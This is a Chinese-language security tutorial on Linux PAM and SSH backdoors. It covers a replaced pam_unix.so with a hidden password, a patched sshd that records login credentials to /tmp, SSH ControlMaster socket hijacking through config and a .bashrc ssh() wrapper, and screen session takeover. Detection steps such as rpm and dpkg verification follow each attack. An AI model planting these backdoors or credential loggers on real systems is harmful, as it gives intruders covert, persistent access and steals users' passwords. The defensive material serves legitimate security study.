首页 > Linux UserSpace Back-Door、Rootkit SSH/PAM Backdoor Attack And Defensive Tchnology

Linux UserSpace Back-Door、Rootkit SSH/PAM Backdoor Attack And Defensive Tchnology


0. 引言
1. Pam后门
2. SSH后门
3. Hijacking SSH
4. Hijacking SSH By Setup A Tunnel Which Allows Multiple Sessions Over The Same SSH Connection Without Re-Authentication
5. Hijacking Active SSH Screen Sessions


0. 引言 

0x1: 安全攻防观点

1. Know Your Enemy : Know Your System
2. Effectivness != Complexity
3. Everything Is A Weapon

0x2: Attacker vs Defender

1. For the Attacker:
Use System Builtin's to Simulate Rootkit Functionality. 尽量做到润物细无声,即把rootkit伪装成系统正常的工具、行为
Stop relying on tools: "Master the environment."2. For the Defender:
Know Your System, Before I Use it Against You.
Thinking like an attacker: "Flip the evil bit."

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1. Pam后门

PAM(插入式验证模块(Pluggable Authentication Module,PAM))简单来说,就是提供了一组身份验证、密码验证的统一抽象接口,应用程序员可以使用这些API接口来实现与安全性相关的功能,PAM可以作为Linux登录验证(包括SSH)的统一验证入口点,也同样出于一点,黑客可以利用PAM部署SSH代码级的逻辑后门

0x1: 查询本机的PAM版本

0x2: 下载对应的源代码文件


0x3: 对原始的PAM so文件进行备份

cd /lib64/security
ll pam_unix.so
mv pam_unix.so pam_unix.so.bak

0x4: 修改源文件,添加逻辑后门

cd /zhenghan/pam-backdoor/Linux-PAM-
vim pam_unix_auth.c

0x5: 重新编译pam模块

cd /zhenghan/pam-backdoor/Linux-PAM-

0x6: 使用包含逻辑后门的pam模块替换系统默认的pam模块

cp /zhenghan/pam-backdoor/Linux-PAM- /lib64/security/pam_unix.so

0x7: 测试后门

1. 使用正常root帐号、密码登录
2. 使用root帐号,后门密码(pam)进行隐藏登录

0x8: 对抗检测方法


1. centos rpm校验已安装包是否被修改
rpm -qV pam
....L....  c /etc/pam.d/fingerprint-auth
....L....  c /etc/pam.d/password-auth
....L....  c /etc/pam.d/smartcard-auth
....L....  c /etc/pam.d/system-auth
S.?......    /lib64/libpam.so.0.82.2
S.?......    /lib64/libpam_misc.so.0.82.0
S.5....T.    /lib64/security/pam_unix.so结果含义
1. 8位长字符串: 8位字符的每一个 用以表示文件与RPM数据库中一种属性的比较结果("."表示检测通过)1) S: 文件大小 2) M: 模式e (包括权限和文件类型)3) 5: 校验和(md5)、?: 文件不可读4) D: 设备5) L: 符号链接6) U: 用户7) G: 组8) T: 文件修改时间
2. c: 用以指配置文件
3. 文件名
*/2. ubuntu 
dpkg -V libpam-modules
??5?????? c /etc/security/limits.conf
??5??????   /lib/x86_64-linux-gnu/security/pam_unix.so


1. 提取包含逻辑后门的pam_unix.so的特征码
2. 加入杀毒特征库
3. 禁止逻辑后门pam_unix.so模块被ssh进程加载

Relevant Link:

http://w ww.csdn123.com/html/itweb/20130911/112822_112821_112829.htm


2. SSH后门

vi includes.h                   //修改后门密码,记录文件位置,/*
+#define ILOG "/tmp/ilog"                      //记录登录到本机的用户名和密码
+#define OLOG "/tmp/olog"                   //记录本机登录到远程的用户名和密码
+#define SECRETPW "123456654321"    //后门的密码

0x1: 后门行为

1. 黑客使用设置的后门密码可以直接跨越验证逻辑登录
2. 管理员用root、其他帐号的登录全部会被秘密记录下来,相当于key logger

0x2: 对抗检测方法

1. 二进制特征检测1) 通过ELF格式动态定位到目标函数的位置2) 在目标函数内部采用clamav的特征库定位方式:【特征:offset:length】
2. 使用系统rpm检测ssh的完整性
3. 检测程序中的string特征字符串,黑客部署的逻辑后门代码一般都有一段字符串特征码
4. 尝试任意密码登录ssh,检查是否被黑客部署了"无密码逻辑后门",即黑客在判断逻辑中直接加入了return语句,跳过任何密码检查逻辑

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3. Hijacking SSH

SSH can also be used to gather inteligence about other potential targets on the network,every time a user connects to a system using SSH a file is created in $HOME/.ssh/ called known_hosts,by examining this file an attacker can see other hosts that trusts the user


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4. Hijacking SSH By Setup A Tunnel Which Allows Multiple Sessions Over The Same SSH Connection Without Re-Authentication

0x1: SSH multiplexing

Multiplexing is the ability to send more than one signal over a single line or connection. With multiplexing, OpenSSH can re-use an existing TCP connection for multiple concurrent SSH sessions rather than creating a new one each time.

1. the overhead of creating new TCP connections is eliminated. The overall number of connections that a machine may accept is a finite resource and the limit is more noticeable on some machines than on others, and varies greatly depending on both load and usage. 
2. with multiplexing only a single TCP connection is set up and used regardless of whether or not there are multiple SSH sessions carried over it.
3. multiplexed connection技术可以显著减少ssh连接时间

0x2: Setting Up Multiplexing


1. ControlMaster: determines whether ssh will listen for control connections and what to do about them. 
2. ControlPath: is the location for the control socket used by the multiplexed sessionsv
3. ControlPersist: can be used in conjunction with ControlMaster. 1) If set to 'yes', it will leave the master connection open in the background indefinitely to accept new connections until either killed explicitly or closed with -O.
//Control sockets are removed automatically when the master connection is ended. 

1. 攻击者有root权限

vim /etc/ssh/ssh_config
ControlPath /tmp/%r@%h:%p
ControlMaster auto
ControlPersist yes

开启了ControlMaster模式之后,如果当前用户已经成功登录过一次目标机器(例如远程跳板机、DMZ机器),则黑客可以利用Multiplexing技术直接"无密码"登录同样的那台服务器,简单来说,SSH的密码验证是基于TCP Connection级别的,而不是会话Session界别的,当发生Multiplexing的时候,黑客的Session可以直接绕过任何的登录验证

2. 攻击者没有root权限

vim $HOME/.ssh/config
ControlPath /tmp/%r@%h:%p
ControlMaster auto
ControlPersist yes

3. 在.bashrc里封装ssh命令

vim $HOMW/.bashrc
ssh () 
{ /usr/bin/ssh -o "ControlMaster=auto" -o "ControlPath=/tmp/%r@%h:%p" -o "ControlPersist=yes" "$@";

利用了Linux Bash的自定义函数的方式、SSH动态配置参数的特性实现了开启ControlMaster模式

0x3: 攻击者复用Multiplexing模式下的Socket会话进行SSH连接

These settings will cause all new SSH sessions to create a persistent brokering master socket.

I've used %h in control socket commands to represent the target host, %h can be any char(s).

This socket can be used to create further sessions, without credentials, even after the original user exits their session.

0x4: Adding a dynamic tunnel

we can create a dynamic tunnel inside an existing master socket

lsof -i TCP:9090
ssh -O forward -D 9090 -S /tmp/root@ %h
lsof -i TCP:9090


0x5: 前面说过,如果ControlPersist为yes,则不会自动删除sockets文件,我们可以手工rm删除/tmp/[email protected]:22,也可以优雅的使用

ssh -O exit -S /tmp/root@ %h

0x6: 对抗检测方法

1. 检查ssh的配置文件中,是否开启了ControlMaster模式1) /etc/ssh/ssh_config2) $HOME/.ssh/config
2. 检查bash自定义函数中是否有ssh()劫持
set | grep "ssh()"

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5. Hijacking Active SSH Screen Sessions


1. 当ssh_user使用
screen ssh root@
连接远程的""时,会在/var/run/screen有显示相应的文件2. ls -la /var/run/screen/
可以用screen -r root/来接管会话 


0x1: 对抗检测方法

1. 检测/var/run/screen/是否包含screen会话,这从某种程度上算是一种可疑事件

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